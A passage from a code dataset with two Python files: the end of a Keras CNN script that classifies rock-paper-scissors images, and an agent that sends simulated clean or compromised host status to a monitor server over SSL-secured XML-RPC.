metrics=['accuracy'])\nmodel.summary()\n\"\"\"\nModel: \"sequential_1\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d_4 (Conv2D) (None, 148, 148, 64) 1792 \n_________________________________________________________________\nmax_pooling2d_4 (MaxPooling2 (None, 74, 74, 64) 0 \n_________________________________________________________________\nconv2d_5 (Conv2D) (None, 72, 72, 64) 36928 \n_________________________________________________________________\nmax_pooling2d_5 (MaxPooling2 (None, 36, 36, 64) 0 \n_________________________________________________________________\nconv2d_6 (Conv2D) (None, 34, 34, 128) 73856 
\n_________________________________________________________________\nmax_pooling2d_6 (MaxPooling2 (None, 17, 17, 128) 0 \n_________________________________________________________________\nconv2d_7 (Conv2D) (None, 15, 15, 128) 147584 \n_________________________________________________________________\nmax_pooling2d_7 (MaxPooling2 (None, 7, 7, 128) 0 \n_________________________________________________________________\nflatten_1 (Flatten) (None, 6272) 0 \n_________________________________________________________________\ndropout_1 (Dropout) (None, 6272) 0 \n_________________________________________________________________\ndense_2 (Dense) (None, 512) 3211776 \n_________________________________________________________________\ndense_3 (Dense) (None, 3) 1539 \n=================================================================\nTotal params: 3,473,475\nTrainable params: 3,473,475\nNon-trainable params: 0\n\"\"\"\nhistory = model.fit(train_generator, epochs=15, validation_data=test_generator)\n\"\"\"\nEpoch 15/15\n79/79 [==============================] - 38s 481ms/step \n- loss: 0.0701 - accuracy: 0.9786 - val_loss: 0.0413 - val_accuracy: 0.9812\n\"\"\"\n\"\"\"\n# Alternative training method:\n# ImageDataGenerator loads images in batches of size=batch_size.\n# steps_per_epoch in model.fit() is the number of batches to yield from generator\n# before declaring one epoch finished.\n# --> steps_per_epoch = ceil( len(training_set)/batch_size )\n#\nhistory = model.fit(train_generator, steps_per_epoch=8, epochs=15,\n validation_data=test_generator, validation_steps=8)\n\n# Here's a more \"manual\" example without using iterator\nfor e in range(epochs):\n batches = 0\n for x_batch, y_batch in train_datagen.flow(x_train, y_train, batch_size=32):\n model.fit(x_batch, y_batch)\n batches += 1\n if batches >= len(x_train) / 32:\n # we need to break the loop by hand because\n # the generator loops indefinitely\n break\n\"\"\"\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(len(acc))\n\nplt.plot(epochs, acc, 'r', label='Training accuracy')\nplt.plot(epochs, val_acc, 'b', label='Validation accuracy')\nplt.title('Training and validation accuracy')\nplt.legend(loc=0)\nplt.figure()\nplt.show()", "sub_path": "cnn_rock_paper_scissors.py", "file_name": "cnn_rock_paper_scissors.py", "file_ext": "py", "file_size_in_byte": 6551, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 83, "usage_type": "call"}, {"api_name": 
"tensorflow.keras.layers.MaxPooling2D", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.RMSprop", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}]} +{"seq_id": "320944269", "text": "import xmlrpc.client\nimport ssl\nimport socket # Required for network/socket connections\nimport os # Required for Forking/child processes\nimport time # Required for sleep call\nimport threading\nimport datetime\nimport dbm\nimport argparse\nimport random\nimport certs.gencert as gencert\nimport config\nimport logging\nfrom logging.config import fileConfig\n\n\n# Load logging config\nfileConfig('/home/shnuser/coding/shn/setup/logging.conf')\nlog = logging.getLogger(__name__)\n\n# Global Variables -- Don't change. 
[No need to change.]\nCERTFILE = \"/bin/shn/certs/domains/local.cert\" # Placeholder; updated when executed\nKEYFILE = \"/bin/shn/certs/domains/local.key\" # Placeholder; updated when executed\nhostIP = \"localhost\" # Default; updated when executed\nAGENT_ALIAS = \"agent\" # Default; updated to match agent hostname when run\nSLEEP_TIME = 60 # Default; updated based on user-provided input\nadmin_selected = False\n\n\n# Return pseudorandom decision on whether host is infected or\n# not; returns True if 'infected'\ndef getDecision():\n log.debug(\"Making a decision...\")\n number = random.randint(1, 99)\n if number > 89:\n answer = True\n else:\n answer = False\n\n log.debug(\"Is host infected: %s\" % answer)\n return answer\n\n\n# Return ip address of local host where server is running\ndef getMyIP():\n log.debug('Getting Host ip address')\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 53))\n ipAdd = s.getsockname()[0]\n s.close()\n log.debug('Socket closed: ipAdd=%s' % ipAdd)\n return ipAdd\n\n\n# Create SSL certs for current ip address if not already present\ndef verifyCerts():\n global CERTFILE\n global KEYFILE\n\n # Determine file path based on current ip address\n CERTFILE = ''.join([config.certPath, config.rootDomain, \".cert\"])\n KEYFILE = ''.join([config.certPath, config.rootDomain, \".key\"])\n log.debug(\"CERTFILE: %s\" % CERTFILE)\n log.debug(\"KEYFILE: %s\" % KEYFILE)\n\n # If cert or key file not present, create new certs\n if not os.path.isfile(CERTFILE) or not os.path.isfile(KEYFILE):\n gencert.gencert(config.rootDomain)\n log.info(\"Certfile(s) NOT present; new certs created.\")\n print(\"Certfile(s) NOT present; new certs created.\")\n\n else:\n log.info(\"Certfiles Verified Present\")\n print(\"Certfiles Verified Present\")\n\n\n# Test connection with Monitor\ndef testConnection(remoteName=config.mntrHostName,\n remotePort=config.mntrServerPort):\n\n log.debug(\"Start of Test Connection Function...\")\n myContext = ssl.create_default_context()\n myContext.load_verify_locations(config.CACERTFILE)\n\n myurl = ''.join(['https://', remoteName, ':', str(remotePort)])\n testResult = False\n\n with xmlrpc.client.ServerProxy(myurl,\n context=myContext) as proxy:\n # Test Connection\n try:\n print(\"Testing connection with Monitor:\")\n testResult = proxy.testConnection()\n\n except ConnectionRefusedError:\n log.warning(\"Connection to Monitor FAILED\")\n log.debug(\"Connection settings used: %s\" % (myurl))\n print(\"Connection to Monitor FAILED:\\n\",\n \"Is Monitor listening? 
Confirm connection\",\n \"settings and try again.\")\n print(\"Connection settings used:\\n '%s'\" % (myurl))\n\n if testResult:\n log.info(\"Connection Test to '%s' SUCCESSFUL!\" % myurl)\n print(\"Connection Test to '%s' SUCCESSFUL!\" % myurl)\n else:\n log.info(\"Connection Test to '%s' FAILED!\" % myurl)\n print(\"Connection Test to '%s' FAILED!\" % myurl)\n\n\n# Change/Update the Monitor's connection settings\ndef updateMonitor():\n log.debug(\"Updating Monitor connection settings\")\n print(\"DEFAULT Monitor Hostname: 'monitor.shn.local'\")\n print(\"CURRENT Monitor Hostname: '%s'\" % config.mntrHostName)\n print(\"ENTER NEW Monitor Hostname: ['q' to keep current]\")\n tempNewHost = input(\">>> \")\n if tempNewHost == 'q':\n log.debug(\"No Change\")\n elif tempNewHost == 'd':\n log.debug(\"Keeping Default\")\n config.mntrHostName = 'monitor.shn.local'\n else:\n config.mntrHostName = tempNewHost\n print(\"DEFAULT Monitor Port: '36363'\")\n print(\"CURRENT Monitor Port: '%s'\" % config.mntrServerPort)\n print(\"ENTER NEW Monitor Port: ['q' to keep current]\")\n tempNewPort = input(\">>> \")\n if tempNewPort == 'q':\n log.debug(\"No Change\")\n elif tempNewPort == 'd':\n log.debug(\"Keeping Default\")\n config.mntrServerPort = 36363\n else:\n config.mntrServerPort = int(tempNewPort)\n\n print(\"UPDATED Monitor Saved: '%s', Port: '%d'\" % (config.mntrHostName,\n config.mntrServerPort))\n log.debug(\"Monitor Saved: '%s', Port: '%d'\" % (config.mntrHostName,\n config.mntrServerPort))\n\n\n# Print entire stored status history\ndef printHistory():\n log.debug(\"Printing entire stored status history...\")\n\n currentTotal = 0\n\n try:\n with dbm.open('cache_esm', 'r') as db:\n currentTotal = int((db.get('total')).decode(\"utf-8\"))\n log.debug(\"Cache found. Total Retrieved.\")\n print(\"Total Saved: %d\" % currentTotal)\n\n except:\n log.debug(\"No cache found or read failed.\")\n print(\"READ FAILED or No Current Status Present\")\n\n if currentTotal > 0:\n # Display history\n log.debug(\"Current Total > 0\")\n print(\"[Update #]: [Update Time] >>> [Status]\")\n for k in range(currentTotal):\n try:\n with dbm.open('cache_esm', 'r') as db:\n readstatus = \"%s.status\" % (k+1)\n readtime = \"%s.time\" % (k+1)\n thisTime = (db.get(readtime)).decode(\"utf-8\")\n thisStatus = (db.get(readstatus)).decode(\"utf-8\")\n if thisStatus == '1':\n pStatus = \"CLEAN ['1']\"\n elif thisStatus == '999':\n pStatus = \"COMPROMISED ['999']\"\n else:\n pStatus = \"UNKNOWN ['???']\"\n print(\"%d: %s >>> %s\" % ((k+1), thisTime, pStatus))\n except:\n log.debug(\"Read Failed with Item %d!\" % (k+1))\n print(\"READ FAILED!\")\n print(\"End of History\")\n log.debug(\"End of History\")\n\n else:\n log.debug(\"No Status. Exiting.\")\n print(\"No Status. Exiting.\")\n\n\n# Check currently-recorded status of ESM/VM\ndef checkStatus():\n log.debug(\"Checking current ESM/VM Status...\")\n try:\n with dbm.open('cache_esm', 'r') as db:\n lastUpdate = (db.get('last_update')).decode(\"utf-8\")\n lastStatus = (db.get('last_status')).decode(\"utf-8\")\n log.debug(\"Cache found. 
Values retrieved.\")\n print(\"ESM/VM Status:\")\n if lastStatus == \"1\":\n print(\"CLEAN ['1'] (as of %s)\" % lastUpdate)\n log.debug(\"CLEAN ['1'] (as of %s)\" % lastUpdate)\n elif lastStatus == \"999\":\n print(\"COMPROMISED ['999'] (as of %s)\" % lastUpdate)\n log.debug(\"COMPROMISED ['999'] (as of %s)\" % lastUpdate)\n else:\n print(\"Unknown Status!!!\")\n log.debug(\"Unknown Status!!!\")\n\n except:\n log.debug(\"No cache found or read failed.\")\n print(\"READ FAILED or No Current Status Present\")\n\n\n# View current monitor connection settings\ndef viewConnection():\n log.debug(\"Checking current Monitor Connection Settings...\")\n\n print(\"\\nMonitor Settings:\")\n print(\"HostName: %s\" % config.mntrHostName)\n print(\"Port: %d\" % config.mntrServerPort)\n log.debug(\"Reading last successful transmit time...\")\n try:\n with dbm.open('cache_esm', 'w') as db:\n lastUpdate = (db.get('last_update')).decode(\"utf-8\")\n log.debug(\"Cache found. Value retrieved.\")\n except:\n log.debug(\"No cache found or read failed.\")\n lastUpdate = \"NONE recorded!!\"\n\n print(\"Last Successful Transmit: %s\" % lastUpdate)\n\n log.debug(\"End of View Connection Function\")\n\n\n# Simple test function to ensure communication is working\ndef mathTest():\n\n log.debug(\"Start of Math Test Function...\")\n myContext = ssl.create_default_context()\n myContext.load_verify_locations(config.CACERTFILE)\n\n myurl = ''.join(['https://', config.mntrHostName, ':',\n str(config.mntrServerPort)])\n\n with xmlrpc.client.ServerProxy(myurl,\n context=myContext) as proxy:\n try:\n print(\"3 + 7 is %d\" % (proxy.add(3, 7)))\n print(\"11 x 9 is: %d\" % (proxy.multiply(11, 9)))\n\n except ConnectionRefusedError:\n log.warning(\"Connection to Monitor Server REFUSED\")\n print(\"Connection to Monitor Server FAILED:\\n\",\n \"Is Monitor listening? Confirm connection\",\n \"settings and port number and try again.\")\n print(\"Settings used: '%s'\" % myurl)\n\n except:\n log.warning(\"Connection to Monitor Server FAILED\")\n print(\"Connection Failed. Suspected incorrect URL.\")\n print(\"Settings used: '%s'\" % myurl)\n\n\ndef logStatus(logStatus, logTime):\n log = logging.getLogger(__name__)\n log.debug(\"Saving Status: %s, at Time: %s\" % (logStatus, logTime))\n storeStatus = str(logStatus)\n storeTime = str(logTime)\n log.debug(\"Values Storing: %s, %s\" % (storeStatus, storeTime))\n\n try:\n with dbm.open('cache_esm', 'w') as db:\n # Get current total and add 1 with type conversions\n newtotal = str(int((db.get('total')).decode(\"utf-8\")) + 1)\n # Store new total in persistent storage\n db['total'] = newtotal\n # Create names based on connection number\n savestatus = \"%s.status\" % (newtotal)\n savetime = \"%s.time\" % (newtotal)\n # Save connection info to persistent storage\n db[savestatus] = storeStatus\n db[savetime] = storeTime\n db['last_update'] = storeTime\n db['last_status'] = storeStatus\n log.debug(\"Cache found. 
Values stored in old cache.\")\n log.debug(\"Saved: %s, %s\" % (storeStatus, storeTime))\n\n except:\n log.debug(\"No cache file found; creating new file.\")\n with dbm.open('cache_esm', 'c') as db:\n db['total'] = \"1\"\n savestatus = \"1.status\"\n savetime = \"1.time\"\n db[savestatus] = storeStatus\n db[savetime] = storeTime\n db['last_update'] = storeTime\n db['last_status'] = storeStatus\n log.debug(\"Saved: %s, %s\" % (storeStatus, storeTime))\n\n log.debug(\"End of log status function\")\n\n\n# Send status update\ndef sendStatus(state=0, userInput=True):\n\n log.debug(\"Start of Send Status Function...\")\n myContext = ssl.create_default_context()\n myContext.load_verify_locations(config.CACERTFILE)\n\n if userInput:\n print(\"Enter Current Status:\")\n print(\"1) CLEAN ['1']\")\n print(\"2) COMPROMISED ['999']\")\n answer = input(\"Make a choice\\n>>> \")\n if answer == \"1\":\n mystatus = 1\n else:\n mystatus = 999\n\n if mystatus == 1:\n print(\"Status selected: 'CLEAN'\")\n else:\n print(\"Status selected: 'COMPROMISED'\")\n print(\"If this is incorrect, resubmit IMMEDIATELY!\")\n\n else:\n mystatus = state\n\n myurl = ''.join(['https://', config.mntrHostName, ':',\n str(config.mntrServerPort)])\n with xmlrpc.client.ServerProxy(myurl,\n context=myContext) as proxy:\n try:\n response = proxy.reportStatus(hostIP, mystatus,\n AGENT_ALIAS)\n log.debug(\"Response: %s\" % response)\n if userInput:\n print(\"Response from Monitor: %s\" % response)\n timeConfirmed = str(datetime.datetime.now())\n print(\"Status '%s' Sent to Monitor; Confirmed at %s.\" % (mystatus,\n timeConfirmed))\n log.debug(\"Time Confirmed: %s\" % timeConfirmed)\n logStatus(mystatus, timeConfirmed)\n log.debug(\"Status Logged\")\n\n except ConnectionRefusedError:\n log.warning(\"Connection to Monitor Server FAILED\")\n if userInput:\n print(\"Connection to Monitor Server FAILED:\\n\",\n \"Is Monitor listening? Confirm connection\",\n \"settings and try again.\")\n print(\"Settings used: '%s'\" % myurl)\n\n except:\n log.warning(\"Connection to Monitor Server FAILED\")\n if userInput:\n print(\"Connection Failed. 
Suspected incorrect URL.\")\n print(\"Settings used: '%s'\" % myurl)\n\n\ndef deleteHistory(no_confirmation=False):\n log.info(\"Delete History Function starting...\")\n confirm = False\n if no_confirmation:\n confirm = True\n else:\n # Get confirmation from user\n print(\"Confirm you wish to DELETE ALL SAVED HISTORY:\")\n answer = input(\"Confirm YES['y'] or NO['n']:\\n>>> \")\n\n if answer in [\"y\", \"Y\", \"YES\", \"yes\", \"Yes\"]:\n log.debug(\"Request for deletion confirmed.\")\n confirm = True\n else:\n log.debug(\"Request for deletion cancelled.\")\n log.debug(\"Answer selected: %s\" % answer)\n confirm = False\n\n # Delete history, if confirmed\n if confirm:\n log.debug(\"Removing history now.\")\n os.remove(\"cache_esm\")\n log.info(\"History Deleted.\")\n else:\n log.debug(\"History was NOT deleted.\")\n\n\n# Run basic 'simulator' to determine infection status\ndef basicSimulation(sleeptime=60):\n log.debug(\"Running basic simulation\")\n\n # Report status as CLEAN three times\n log.debug(\"Reporting status CLEAN three times.\")\n\n for k in range(3):\n currentStatus = 1\n\n # Log current state\n log.debug(\"Current Status: CLEAN ['1']\")\n\n # Report current state\n sendStatus(state=currentStatus, userInput=False)\n\n # Sleep One Time period\n time.sleep(sleeptime)\n\n # Report status as COMPROMISED three times\n for k in range(3):\n currentStatus = 999\n\n # Log current state\n log.debug(\"Current Status: COMPROMISED ['999']\")\n # If this is the first time this is reported compromised\n # then log as a warning and print as well\n if k == 0:\n log.warning(\"HOST NOW COMPROMISED ['999']!!!\")\n print(\"HOST NOW COMPROMISED ['999']!!! TAKE ACTION!!!\")\n\n # Report current state\n sendStatus(state=currentStatus, userInput=False)\n\n # Sleep One Time period\n time.sleep(sleeptime)\n\n\n# Run 'simulator' to randomly determine infection status\ndef randomSimulation(sleeptime=60):\n log.debug(\"Running random simulation\")\n while True:\n # Get current status\n log.debug(\"Checking current ESM/VM Status...\")\n lastStatus = 1\n currentStatus = 1\n try:\n with dbm.open('cache_esm', 'r') as db:\n lastStatus = int((db.get('last_status')).decode(\"utf-8\"))\n log.debug(\"Cache found. Values retrieved: %d\" % lastStatus)\n except:\n log.debug(\"No cache found or read failed.\")\n print(\"READ FAILED or No Current Status Present\")\n\n # If current is infected, remain infected\n if not lastStatus == 1:\n currentStatus = lastStatus\n\n # If current not infected, get new decision\n else:\n r = getDecision()\n if r:\n currentStatus = 999\n else:\n currentStatus = 1\n\n # Log current state\n if currentStatus == 1:\n log.debug(\"Current Status: CLEAN ['1']\")\n elif currentStatus == 999:\n log.debug(\"Current Status: COMPROMISED ['999']\")\n\n # If this is the first time this is reported compromised\n # then log as a warning and print as well\n if not lastStatus == 999:\n log.warning(\"HOST NOW COMPROMISED ['999']!!!\")\n print(\"HOST NOW COMPROMISED ['999']!!! TAKE ACTION!!!\")\n\n else:\n log.debug(\"Unknown Status!!! ... 
%d\" % currentStatus)\n\n # Report current state\n sendStatus(state=currentStatus, userInput=False)\n\n # Sleep for set time limit before repeating\n log.debug(\"Sleeping for %d seconds.\" % sleeptime)\n time.sleep(sleeptime)\n\n\n# Start basic simulation as background / thread process\ndef startBasicSimulation():\n\n log.info(\"Starting basic simulation as background thread\")\n t = threading.Thread(name=\"BasicSimulation\",\n target=basicSimulation,\n args=(SLEEP_TIME,\n )\n )\n t.daemon = True\n log.debug(\"Starting daemon simulation thread\")\n t.start()\n\n\n# Quit gracefully after terminting all child processes\ndef myQuit():\n log.info(\"ESM Exiting. Goodbye.\")\n\n print(\"ESM Exiting. Goodbye.\\n\")\n raise SystemExit\n\n\ndef invalid(choice):\n log.debug(\"Invalid choice: %s\" % choice)\n print(\"INVALID CHOICE!\")\n\n\ndef adminMenu():\n log.debug(\"Displaying admin menu\")\n print(\"\\nAdmin Menu:\")\n print(\"a) Connection Test (simple math test)\")\n print(\"b) SSL Verification (verify certificates\")\n print(\"c) View ALL Saved History\")\n print(\"d) Delete ESM History\")\n print(\"e) Send Status* to Monitor [user-provided status]\")\n print(\"f) CHANGE/UPDATE Monitor Settings\")\n print(\"9) BACK (return to 'Menu')\")\n return input(\"Make a Choice\\n>>> \")\n\n\ndef adminSelection():\n global admin_selected\n adminChoice = adminMenu()\n if adminChoice == \"a\":\n mathTest()\n elif adminChoice == \"b\":\n verifyCerts()\n elif adminChoice == \"c\":\n printHistory()\n elif adminChoice == \"d\":\n deleteHistory()\n elif adminChoice == \"e\":\n sendStatus()\n elif adminChoice == \"f\":\n updateMonitor()\n elif adminChoice == \"9\":\n log.debug(\"Admin is De-selected\")\n print(\"Back to Main Menu...\")\n admin_selected = False\n elif adminChoice == \"r\":\n # Refresh Menu (do nothing)\n log.info(\"Refreshing Menu\")\n elif adminChoice in [\"q\", \":q\"]:\n myQuit()\n else:\n invalid(adminChoice)\n\n\ndef menu():\n log.debug(\"Displaying menu\")\n print(\"\\n\\nMENU[ESM]:\")\n print(\"1) Check current ESM status\")\n print(\"2) View Monitor Connection Settings\")\n print(\"3) Send 'CLEAN' Status to Monitor\")\n print(\"4) Send 'COMPROMISED' Status to Monitor\")\n print(\"5) Start BASIC Simulation [in background]\")\n print(\"6) Test Connection with Monitor\")\n print(\"9) ADMIN MENU\")\n print(\"q) QUIT\")\n return input(\"Make a Choice\\n>>> \")\n\n\ndef myMenu():\n global admin_selected\n choice = 0\n if admin_selected:\n choice = \"9\"\n else:\n choice = menu()\n if choice == \"1\":\n checkStatus()\n elif choice == \"2\":\n viewConnection()\n elif choice == \"3\":\n sendStatus(state=1, userInput=False)\n elif choice == \"4\":\n sendStatus(state=999, userInput=False)\n elif choice == \"5\":\n startBasicSimulation()\n elif choice == \"6\":\n testConnection()\n elif choice == \"9\":\n admin_selected = True\n log.debug(\"Admin is Selected\")\n adminSelection()\n elif choice in [\"q\", \":q\"]:\n myQuit()\n elif choice == \"r\":\n # Refresh Menu (do nothing)\n log.info(\"Refreshing Menu\")\n else:\n invalid(choice)\n\n\n# Process arguments and notify user of their choices\ndef processArguments(args):\n log.info(\"Processing arguments...\")\n\n global AGENT_ALIAS\n global SLEEP_TIME\n\n # Accept user-provided monitor hostname, if provided\n if args.monitor:\n print(\"Monitor hostname set manually\")\n print(\"Using hostname: %s\" % (args.monitor))\n log.debug(\"Using monitor hostname: %s\" % (args.monitor))\n config.mntrHostName = args.monitor\n\n else:\n print(\"Using default 
monitor hostname: %s\" % config.mntrHostName)\n log.debug(\"Using default monitor hostname: %s\" % config.mntrHostName)\n\n # Accept user-provided monitor port number, if provided\n if args.port:\n print(\"Monitor port set manually\")\n print(\"Using port#: %d\" % (args.port))\n log.debug(\"Using monitor port#: %d\" % (args.port))\n config.mntrServerPort = args.port\n\n else:\n print(\"Using default monitor port#: %s\" % config.mntrServerPort)\n log.debug(\"Using default monitor port#: %s\" % config.mntrServerPort)\n\n # Accept user-provided ESM alias, if provided\n if args.alias:\n print(\"ESM Alias set manually\")\n print(\"Using alias: %s\" % (args.alias))\n log.debug(\"Using ESM alias: %s\" % (args.alias))\n AGENT_ALIAS = args.alias\n\n else:\n AGENT_ALIAS = (config.agntHostName).split('.')[0]\n log.debug(\"Using default ESM Alias: %s\" % (AGENT_ALIAS))\n print(\"Using alias: %s\" % (AGENT_ALIAS))\n\n # Accept user-provided sleep time, if provided\n if args.time:\n print(\"Sleep time set manually\")\n print(\"Using sleep = %d seconds\" % (args.time))\n log.debug(\"Using sleep = %d seconds\" % (args.time))\n SLEEP_TIME = args.time\n\n # Announce running in Basic Simulation mode, if applicable\n if args.basic:\n print(\"ESM running simulation in basic mode.\")\n log.debug(\"ESM running simulation in basic mode.\")\n\n # Announce running in Simulation mode, if applicable\n if args.simulation:\n print(\"ESM now executing in simulation mode.\")\n log.debug(\"ESM executing in simulation mode.\")\n\n # Delete previous status history, if applicable\n if args.fresh:\n log.debug(\"Fresh start selected.\")\n deleteHistory(True)\n print(\"History Deleted: Starting Fresh\")\n\n log.info(\"End of 'process arguments.'\")\n\n\n# Start of Main\nif __name__ == '__main__':\n log.info(\"Starting MAIN. 
Parsing arguments.\")\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-S\", \"--simulation\", help=\"run ESM in simulation\\\n mode, which does not allow user interaction\",\n action=\"store_true\")\n parser.add_argument(\"-B\", \"--basic\", help=\"run simulation in basic mode\\\n (3 clean reports, then 3 compromised reports)\\\n Recommendation: Use with '-t' flag to adjust pace.\",\n action=\"store_true\")\n parser.add_argument(\"-t\", \"--time\", help=\"set sleep time [in seconds]\\\n used for simulation (Default: 60)\", type=int)\n parser.add_argument(\"-m\", \"--monitor\", help=\"set hostname of monitor\\\n (e.g., 'monitor.shn.local')\")\n parser.add_argument(\"-p\", \"--port\", help=\"set port of monitor\\\n (e.g., '36363')\", type=int)\n parser.add_argument(\"-a\", \"--alias\", help=\"manually set ESM alias\\\n (Note: MUST match alias of Agent running in\\\n corresponding VM's hypervisor.)\")\n parser.add_argument(\"-F\", \"--fresh\", help=\"start fresh: remove status\\\n history before starting\", action=\"store_true\")\n args = parser.parse_args()\n\n # Process arguments\n processArguments(args)\n\n # Start of Main functionality\n log.info(\"Starting Main [ESM]\")\n hostIP = getMyIP()\n pid = os.getpid()\n print(\"Host IP: %s\" % (hostIP))\n log.debug(\"PID: %d\" % (pid))\n\n # Verify certificates present prior to displaying menu\n log.debug(\"Verifying certificates.\")\n verifyCerts()\n time.sleep(2)\n\n # If NOT simulation mode, display menu [repeatedly] for user\n if not args.simulation:\n while True:\n myMenu()\n time.sleep(1)\n\n # Otherwise, start daemon loop requiring no user input\n else:\n if args.basic:\n log.info(\"Simulation loop started now (Mode=Basic).\")\n while True:\n basicSimulation(SLEEP_TIME)\n log.info(\"End of Basic simulation: Repeating.\")\n else:\n log.info(\"Simulation loop started now (Mode=Normal).\")\n randomSimulation(SLEEP_TIME)\n", "sub_path": "esm_auto/esm.py", "file_name": "esm.py", "file_ext": "py", "file_size_in_byte": 24575, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.config.fileConfig", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 34, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 47, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 47, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 47, "usage_type": "attribute"}, {"api_name": "config.certPath", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.rootDomain", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.certPath", "line_number": 62, "usage_type": "attribute"}, {"api_name": "config.rootDomain", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "certs.gencert.gencert", "line_number": 68, "usage_type": "call"}, {"api_name": "certs.gencert", "line_number": 68, "usage_type": "name"}, {"api_name": "config.rootDomain", "line_number": 68, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 78, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 79, "usage_type": "attribute"}, {"api_name": "ssl.create_default_context", "line_number": 82, "usage_type": "call"}, 
{"api_name": "config.CACERTFILE", "line_number": 83, "usage_type": "attribute"}, {"api_name": "xmlrpc.client.client.ServerProxy", "line_number": 88, "usage_type": "call"}, {"api_name": "xmlrpc.client.client", "line_number": 88, "usage_type": "attribute"}, {"api_name": "xmlrpc.client", "line_number": 88, "usage_type": "name"}, {"api_name": "config.mntrHostName", "line_number": 115, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 122, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 124, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 126, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 133, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 135, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 137, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 138, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 139, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 140, "usage_type": "attribute"}, {"api_name": "dbm.open", "line_number": 150, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 165, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 192, "usage_type": "call"}, {"api_name": "config.mntrHostName", "line_number": 217, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 218, "usage_type": "attribute"}, {"api_name": "dbm.open", "line_number": 221, "usage_type": "call"}, {"api_name": "ssl.create_default_context", "line_number": 237, "usage_type": "call"}, {"api_name": "config.CACERTFILE", "line_number": 238, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 240, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 241, "usage_type": "attribute"}, {"api_name": "xmlrpc.client.client.ServerProxy", "line_number": 243, "usage_type": "call"}, {"api_name": "xmlrpc.client.client", "line_number": 243, "usage_type": "attribute"}, {"api_name": "xmlrpc.client", "line_number": 243, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 263, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 270, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 288, "usage_type": "call"}, {"api_name": "ssl.create_default_context", "line_number": 305, "usage_type": "call"}, {"api_name": "config.CACERTFILE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 327, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 328, "usage_type": "attribute"}, {"api_name": "xmlrpc.client.client.ServerProxy", 